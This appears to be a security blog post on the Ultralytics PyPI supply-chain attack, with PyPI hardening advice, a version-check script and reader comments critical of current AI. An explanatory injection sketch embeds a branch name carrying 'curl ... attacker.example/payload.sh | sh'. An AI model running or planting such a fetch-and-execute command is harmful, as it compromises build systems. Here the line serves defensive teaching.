
Ultralytics Supply-Chain Attack

Last week, we saw a supply-chain attack against the Ultralytics AI library on GitHub. A quick summary:

On December 4, a malicious version 8.3.41 of the popular AI library ultralytics—which has almost 60 million downloads—was published to the Python Package Index (PyPI) package repository. The package contained downloader code that was downloading the XMRig coinminer. The compromise of the project’s build environment was achieved by exploiting a known and previously reported GitHub Actions script injection.

Lots more details at that link. Also here.
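To make the mechanism concrete, here is a minimal illustrative sketch (my own construction, not the actual Ultralytics workflow; the branch name and payload URL are invented) of how a GitHub Actions script injection of this general class works: ${{ ... }} expressions are expanded textually into a run: step's shell script before it executes, so an attacker-controlled context value such as a pull-request branch name becomes code rather than data.

```python
# Illustrative sketch only (not the real Ultralytics workflow). It mimics what a
# GitHub Actions runner does when a `run:` step interpolates an attacker-controlled
# context value, here a pull-request branch name, directly into the script text.
import subprocess

# Attacker-controlled value, e.g. a crafted branch name on a pull request (invented).
branch_name = 'pr"; curl -sSf https://attacker.example/payload.sh | sh; echo "'

# Vulnerable pattern: textual expansion of ${{ github.head_ref }} into the script,
# so the quoted payload above becomes part of the commands the runner executes.
template = 'echo "Building branch ${{ github.head_ref }}"'
expanded = template.replace("${{ github.head_ref }}", branch_name)
print(expanded)  # the injected `curl ... | sh` is now shell code, not data
# subprocess.run(expanded, shell=True)  # running this would fetch and execute the payload

# Safer pattern: pass untrusted values to the step via the environment, so the shell
# treats them as data and never re-parses them as commands.
safe = 'echo "Building branch $BRANCH_NAME"'
subprocess.run(safe, shell=True, env={"BRANCH_NAME": branch_name})
```

The summary above attributes the build-environment compromise to a known script injection of this kind; the sketch only shows why interpolating untrusted context values into build scripts is dangerous.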

Seth Michael Larson—the security developer in residence with the Python Software Foundation, responsible for, among other things, securing PyPI—has a good summary of what should be done next:

From this story, we can see a few places where PyPI can help developers towards a secure configuration without infringing on existing use-cases.

  • API tokens are allowed to go unused alongside Trusted Publishers. It’s valid for a project to use a mix of API tokens and Trusted Publishers because Trusted Publishers aren’t universally supported by all platforms. However, API tokens that are being unused over a period of time despite releases continuing to be published via Trusted Publishing is a strong indicator that the API token is no longer needed and can be revoked.
  • GitHub Environments are optional, but recommended, when using a GitHub Trusted Publisher. However, PyPI doesn’t fail or warn users that are using a GitHub Environment that the corresponding Trusted Publisher isn’t configured to require the GitHub Environment. This fact didn’t end up mattering for this specific attack, but during the investigation it was noticed as something easy for project maintainers to miss.

There’s also a more general “What can you do as a publisher to the Python Package Index” list at the end of the blog post.
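On the consuming side, a quick sanity check is to make sure no environment still has the compromised release installed. A minimal sketch, using only the 8.3.41 version named in the summary above (extend the set if your own advisory sources list further affected releases):

```python
# Check whether the ultralytics package installed in this environment is the
# compromised 8.3.41 release mentioned above. The known-bad list is deliberately
# conservative; extend it from your own advisory data if needed.
from importlib.metadata import PackageNotFoundError, version

KNOWN_BAD = {"8.3.41"}  # malicious release named in the article

try:
    installed = version("ultralytics")
except PackageNotFoundError:
    print("ultralytics is not installed in this environment")
else:
    if installed in KNOWN_BAD:
        print(f"WARNING: ultralytics {installed} is a known-compromised release; "
              "pin a clean version and rebuild the environment")
    else:
        print(f"ultralytics {installed} is not in the known-bad list")
```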

Posted on December 13, 2024 at 11:33 AM

Comments

Clive Robinson December 14, 2024 8:23 PM

@ Bruce, ALL,

If you think about it,

“If you make a wall of untested bricks from brickworks of unknown repute, do not be surprised if the edifice you build descends when least desired.”

This is not being nasty to Open Source development or nice to Closed Source development: at a basic level they are the same process, and the outcome depends not on unfounded mantras but on real, tested, and proven engineering. There is no place for artisanal craftsmanship using questionable “guild” patterns. I thought people had “seen the light” on this, as it is actually the reason “Software BOMs” are seen as a foundational activity.

On a more general note, it is a well established engineering principle that the strength of a structure you build rests in the mechanism by which load and stress are transmitted down through the structure and dissipated by being carried away.

This means that you really have to pay attention not just to the base foundations but to what is both above and below them; they are integral to sound functioning. And as with every link in a chain, each part’s strength and weight within the whole is important if failure is to be avoided.

Those not just designing but building systems need to stop with the “Slap a bit of muck in” or “Just bolt/weld another bit on” almost “auto-reflex” behaviours.

Sure, they can get things done quickly, but by and large what they build up all too quickly is “Technical Debt”, “Complexity”, and really bad interfacing. Oh, and a rather distinct lack of “Effective Error and Exception handling” and all the bad that results.

Just one bad result of which is “Easy Supply Chain Vulnerabilities”; another is unwanted “Side Channels” hemorrhaging information that should not be disclosed. But “one that burns” is when “tools get abused”, as all too often happens with tools these days.

Like much else that goes wrong in the Software Development Industry, all of these failings and most of what causes them are well known.

Thus you have to wonder why people are not questioning the processes that are quite obviously “Currently Failing Us?”…

Clive Robinson January 4, 2025 2:39 PM

Originally sent Mon 30th Dec ~0755 UTC to:

https://www.schneier.com/blog/archives/2024/12/ultralytics-supply-chain-attack.html

@ Bruce, ALL,

Taking the,

“If you make a wall of untested bricks from brickworks of unknown repute, do not be surprised if the edifice you build descends when least desired.”

A little further,

“Even if the bricks you use are tested and from a source of good repute you have to consider what they are laid upon.”

All structures are in effect built in layers, thus you have rather more to think upon,

“Even a solid foundation layer will fail if the solum (ground) upon which it rests is not sound, with the solum resting in turn on the underlying geology, which also has to be sound.”

It’s why we have metaphors of “feet of clay” and “building on shifting sands”.

In essence all engineering and science is built in layers that form recognised “stacks” that are so implicit we oft forget about them and thus assume all is well.

But what if things are not sound?

In the past I’ve talked about “bubbling up attacks” in hardware, and below-CPU-level DMA and MMU attacks have been known almost since the techniques were invented and deployed back in the 1970s. More recently, “RowHammer” and similar have shown how very low level faults way down in the computing stack can be used by users “reaching around” all the security mechanisms.

Which brings us around to the lower layers of the stack.

In the past I’ve pointed out that the US NSA, UK GCHQ and other National SigInt Agencies attack “Implementation and algorithms” in various ways, not least by arranging for side channel attacks to appear in implementations, but also by critically affecting Standards, Protocols, and their underlying algorithms.

None of these very low level attacks are unique to SigInt Agencies; many people design algorithms and write them into standards. The example of the IEEE, WiFi, and RC4 should be sufficient to demonstrate this. The IETF has likewise had its own issues, as have many others. It’s kind of a “chicken and egg” problem: you have to have algorithms to make protocols, and in turn those are needed to make standards. However, people generally do not work on the security of algorithms until standards are actually implemented.

Which brings us around to AI and the current LLM and ML algorithms that are being hyped into a faux market economic bubble.

Many have jumped on the bandwagon, but few if any of them appear to consider that these current fundamental algorithms can in no way deliver what the hype of VCs and associated shills “building the bubble” promises.

I’ve actually said that these current AI systems cannot deliver, and advised people to treat them with deep suspicion, based on over four decades of experience using not just AI but the fundamental algorithms the current AI LLM and ML systems are actually based upon.

Now it’s up to others to judge whether they believe, or want to believe, what I say, and whether they want to use the information in their own risk analysis; all I can say is consider my words and apply due caution.

But it’s not just my words…

Consider the much respected British Computer Society and its journals, and what they have recently published.

From the Professor of Cyber Security at the much respected De Montfort University (in Leicester, UK), Eerke Boiten,

“From the perspective of software engineering, current AI systems are unmanageable, and as a consequence their use in serious contexts is irresponsible. For foundational reasons (rather than any temporary technology deficit), the tools we have to manage complexity and scale are just not applicable.”

From,

https://www.bcs.org/articles-opinion-and-research/does-current-ai-represent-a-dead-end/

Note that the professor, like me, qualifies what we say with “current AI systems”, and that their use in anything other than the equivalent of research tools and parlor trick toys is at best “irresponsible”; thus they should not be used in “serious contexts”. That is something programmers who have used “current AI generated code” have rather rapidly found out, hence the observations and jokes about the AI behind it being not even a “0.1X programmer” or equivalent.

When you have an understanding of how this AI code generation actually works, you can easily see why this is. In effect the code generated will be an average of the lowest common denominator, and if its output gets fed back, as is very likely to happen, then a downward spiral to the bottom if not the dregs will result as a certainty.
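As a toy illustration of that downward spiral (my own sketch, not anything from the comment or the BCS article): if each generation of output clusters around the average of the previous generation and is then fed back as the next generation’s input, the spread of the data, standing in here for diversity and quality range, collapses within a handful of rounds.

```python
# Toy model of output-fed-back-as-input degradation. Each round replaces the data
# with samples drawn around the current mean, with the tails under-represented, so
# the spread shrinks geometrically generation after generation.
import random

def spread(xs):
    m = sum(xs) / len(xs)
    return (sum((x - m) ** 2 for x in xs) / len(xs)) ** 0.5

def next_generation(xs, tail_loss=0.5):
    m = sum(xs) / len(xs)
    return [m + random.gauss(0, spread(xs) * tail_loss) for _ in xs]

data = [random.gauss(0, 1.0) for _ in range(1000)]  # a diverse starting corpus
for gen in range(8):
    print(f"generation {gen}: spread = {spread(data):.3f}")
    data = next_generation(data)
```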

I feel as the Prof does that,

“… there are some principles which I believe to be both universal and unsatisfiable with current AI systems.”

And as the Prof indicates in his conclusion,

“In my mind, all this puts even state-of-the-art current AI systems in a position where professional responsibility dictates the avoidance of them in any serious application. When all its techniques are based on testing, AI safety is an intellectually dishonest enterprise.”

The whole BCS piece is well worth the few minutes it takes to read, and the Prof’s arguments are well founded.
